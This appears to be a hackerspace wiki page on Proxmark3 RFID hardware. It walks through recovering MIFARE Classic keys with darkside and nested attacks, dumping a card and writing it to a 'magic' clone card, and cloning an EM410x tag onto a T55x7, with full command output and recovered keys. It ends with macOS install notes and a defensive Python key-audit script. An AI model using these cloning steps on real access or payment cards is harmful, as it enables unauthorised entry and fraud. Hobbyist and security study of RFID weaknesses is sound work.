Proxmark3

Thanks to Jan we have a Proxmark3, a Proxmark3 Easy and also 2 Chameleons.

The RFID case with the gear, including cards etc., is available from me on request.

The Proxmark3 Easy currently has problems with Legic Prime; this still needs to be debugged.

The matching software is installed on the DL0MUC computer; it needs to be updated sometime™.

Mifare: to-do with Jan

At 34C3 we played around with it some more; here are a few tips
(I'm too lazy to look this up again every time)

  • Find a valid key
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average  :-)
Press the key on the proxmark3 device to abort both proxmark3 and client.
-------------------------------------------------------------------------
........................



uid(352c1f4c) nt(b30c6cee) par(ba92426af29a2a32) ks(0008090f0e0f070d) nr(00000000)

          
|diff|{nr}    |ks3|ks3^5|parity         |
+----+--------+---+-----+---------------+
| 00 |00000000| 0 |  5  |0,1,0,1,1,1,0,1|
| 20 |00000020| 8 |  d  |0,1,0,0,1,0,0,1|
| 40 |00000040| 9 |  c  |0,1,0,0,0,0,1,0|
| 60 |00000060| f |  a  |0,1,0,1,0,1,1,0|
| 80 |00000080| e |  b  |0,1,0,0,1,1,1,1|
| a0 |000000a0| f |  a  |0,1,0,1,1,0,0,1|
| c0 |000000c0| 7 |  2  |0,1,0,1,0,1,0,0|
| e0 |000000e0| d |  8  |0,1,0,0,1,1,0,0|
key_count:1
------------------------------------------------------------------
Key found:e251a9da734d 
          
Found valid key:e251a9da734d
proxmark3>
  • Using the key found above, recover all the remaining keys (takes a while)
proxmark3> hf mf nested 1 0 A e251a9da734d d
--block no:00 key type:00 key:e2 51 a9 da 73 4d  etrans:0          
Block shift=0          
Testing known keys. Sector count=16          
nested...          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=0 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=8 trgkey=0          
Found valid key:06930625f573          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=8 trgkey=1          
Found valid key:9aeb465f44c9          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=12 trgkey=0          
Found valid key:3ed2990cc0c3          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=12 trgkey=1          
Found valid key:f9e3c2b9421a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=1          
Found valid key:f18ea2dcca6f          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=1          
Found valid key:6f259862ef91          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=1          
Found valid key:d412a41ecb09          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=44 trgkey=0          
Found valid key:d271ff53eeda          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=44 trgkey=1          
Found valid key:b6ca78eabb2a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=48 trgkey=0          
Found valid key:cb87a64088e7          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=48 trgkey=1          
Found valid key:0653bf2b8701          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=1          
Found valid key:541550280d7e          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=60 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=60 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=0 trgkey=1          
Found valid key:322c9cbbe53f          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=0          
Found valid key:9c8c07c9f190          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=16 trgkey=0          
Found valid key:5ed4f3654421          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=0          
Found valid key:9dec238a9214          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=40 trgkey=1          
Found valid key:bd451e445aed          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=0          
Found valid key:472a6f5519ad          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=20 trgkey=0          
Found valid key:cfea5408a6da          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=32 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=52 trgkey=0          
Found valid key:a6d80a83ded6          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=28 trgkey=0          
Found valid key:f0bf64a6bf6a          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=36 trgkey=0          
Found valid key:8f0e6a510598          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=56 trgkey=1          
Found valid key:f3be399eba7b          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=24 trgkey=1          
Found valid key:59039bbc5f20          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
-----------------------------------------------          
uid:352c1f4c len=2 trgbl=4 trgkey=1          
Found valid key:5a6041c9f9fc          
Time in nested: 37,380 (0,603 sec per key)

-----------------------------------------------
Iterations count: 62

          
|---|----------------|---|----------------|---|          
|sec|key A           |res|key B           |res|          
|---|----------------|---|----------------|---|          
|000|  e251a9da734d  | 1 |  322c9cbbe53f  | 1 |          
|001|  9c8c07c9f190  | 1 |  5a6041c9f9fc  | 1 |          
|002|  06930625f573  | 1 |  9aeb465f44c9  | 1 |          
|003|  3ed2990cc0c3  | 1 |  f9e3c2b9421a  | 1 |          
|004|  5ed4f3654421  | 1 |  f18ea2dcca6f  | 1 |          
|005|  cfea5408a6da  | 1 |  6f259862ef91  | 1 |          
|006|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|007|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|008|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|009|  8f0e6a510598  | 1 |  d412a41ecb09  | 1 |          
|010|  9dec238a9214  | 1 |  bd451e445aed  | 1 |          
|011|  d271ff53eeda  | 1 |  b6ca78eabb2a  | 1 |          
|012|  cb87a64088e7  | 1 |  0653bf2b8701  | 1 |          
|013|  a6d80a83ded6  | 1 |  541550280d7e  | 1 |          
|014|  472a6f5519ad  | 1 |  f3be399eba7b  | 1 |          
|015|  f0bf64a6bf6a  | 1 |  59039bbc5f20  | 1 |          
|---|----------------|---|----------------|---|          
Printing keys to bynary file dumpkeys.bin...
proxmark3>
  • Dump the card's contents using the keys found
proxmark3> hf mf dump
|-----------------------------------------|          
|------ Reading sector access bits...-----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
#db# READ BLOCK FINISHED                 
|-----------------------------------------|          
|----- Dumping all blocks to file... -----|          
|-----------------------------------------|          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin'          
#db# READ BLOCK FINISHED                 
Dumped card data into 'dumpdata.bin' 
proxmark3>
  • Convert the resulting dump to eml format (the PM3 scripts are in the downloads at the end of the page)
user@host:~$ ./pm3_bin2eml.py dumpdata.bin dumpdata.eml
  • Load the eml file onto a “Magic Chinese Guy” card (place it on the Proxmark first, of course!)
proxmark3> hf mf cload dumpdata
Loaded from file: dumpdata.eml          
proxmark3> 
  • Done
  • Read the card
proxmark3> lf em4x em410xwatch
#db# buffer samples: d1 cd c5 c0 ba b7 b2 af ...                 
Reading 16000 samples
          
Done!
          
Auto-detected clock rate: 64          
EM410x Tag ID: 0101160061          
Unique Tag ID: 0808860068          
proxmark3> 
  • Write the UID (here: EM410x Tag ID) to a blank card (T5555 or T55x7)
proxmark3> lf em4x em410xwrite 0101160061 1
Writing T55x7 tag with UID 0x0101160061 (clock rate: 64)          
#db# Started writing T55x7 tag ...                 
#db# Clock rate: 64                 
#db# Tag T55x7 written with 0xff806018d8003060
  • Done
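
An added example (not part of the original wiki page and not Proxmark code): a small audit of the 1024-byte `dumpdata.bin` that `hf mf dump` writes for a MIFARE Classic 1K card, reporting well-known default keys, keys shared between sectors and sector trailers whose access bits fail their inverted-copy check. It assumes the trailer blocks in the dump hold both keys; `build_sample_dump` and the default-key list are constructed for illustration.

```python
from collections import defaultdict

BLOCK, BLOCKS_PER_SECTOR, SECTORS_1K = 16, 4, 16
# Widely published default keys (assumption: not taken from this page).
DEFAULT_KEYS = {"ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7", "000000000000"}


def access_bits_valid(b6, b7, b8):
    """Trailer bytes 6..8 store each nibble C1..C3 once plain, once inverted."""
    c1, c1_inv = b7 >> 4, b6 & 0x0F
    c2, c2_inv = b8 & 0x0F, b6 >> 4
    c3, c3_inv = b8 >> 4, b7 & 0x0F
    return all(p ^ i == 0x0F for p, i in ((c1, c1_inv), (c2, c2_inv), (c3, c3_inv)))


def parse_trailers(dump):
    """Return key A, key B and access-bit validity for each sector trailer."""
    if len(dump) != SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    trailers = []
    for sector in range(SECTORS_1K):
        off = (sector * BLOCKS_PER_SECTOR + 3) * BLOCK  # last block of the sector
        t = dump[off:off + BLOCK]
        trailers.append({"sector": sector, "key_a": t[0:6].hex(),
                         "key_b": t[10:16].hex(),
                         "access_ok": access_bits_valid(t[6], t[7], t[8])})
    return trailers


def audit(dump):
    """Summarise weak key management visible in the dump."""
    trailers = parse_trailers(dump)
    usage = defaultdict(set)  # key -> sectors that use it
    for t in trailers:
        usage[t["key_a"]].add(t["sector"])
        usage[t["key_b"]].add(t["sector"])
    return {"default": sorted(k for k in usage if k in DEFAULT_KEYS),
            "reused": {k: sorted(s) for k, s in usage.items() if len(s) > 1},
            "bad_access": [t["sector"] for t in trailers if not t["access_ok"]]}


def build_sample_dump():
    """Constructed 1K image: shared key in sectors 6/7, default key B in 15,
    corrupted access bits in sector 3. All values are made up."""
    dump = bytearray(SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK)
    for sector in range(SECTORS_1K):
        key_a, key_b = bytes([0x10 + sector] * 6), bytes([0x80 + sector] * 6)
        access = bytes.fromhex("ff078069")  # transport configuration
        if sector in (6, 7):
            key_a = bytes.fromhex("aabbccddeeff")
        if sector == 15:
            key_b = bytes.fromhex("ffffffffffff")
        if sector == 3:
            access = bytes.fromhex("ff0f8069")  # C3 no longer matches its inverse
        off = (sector * BLOCKS_PER_SECTOR + 3) * BLOCK
        dump[off:off + BLOCK] = key_a + access + key_b
    return bytes(dump)


if __name__ == "__main__":
    print(audit(build_sample_dump()))
```

To check a real dump, pass `open("dumpdata.bin", "rb").read()` to `audit` instead of the constructed image.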

0x51243648
0x000D8787

lf t55xx writeblockPWD 00148041 0 51243648

  • Install Homebrew (run in a terminal window)

/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"

* Install Proxmark

brew tap proxmark/proxmark3
brew install proxmark3

Currently broken (as of 15.1.2018); in that case install with this parameter:

brew install --HEAD proxmark3

* Find the TTY port (connect the Proxmark3 first)

ls /dev/cu*

* Start (for me it was usbmodem21; adjust accordingly)

proxmark3 /dev/cu.usbmodem21  

* From here on, all proxmark commands work as usual

In client/Makefile, change this:

  CXXFLAGS = $(shell pkg-config --cflags QtCore QtGui 2>/dev/null) -Wall -O4
  QTLDLIBS = $(shell pkg-config --libs QtCore QtGui 2>/dev/null)
  MOC = /usr/lib/x86_64-linux-gnu/qt4/bin/moc
  • Last modified: 2021/04/18 12:32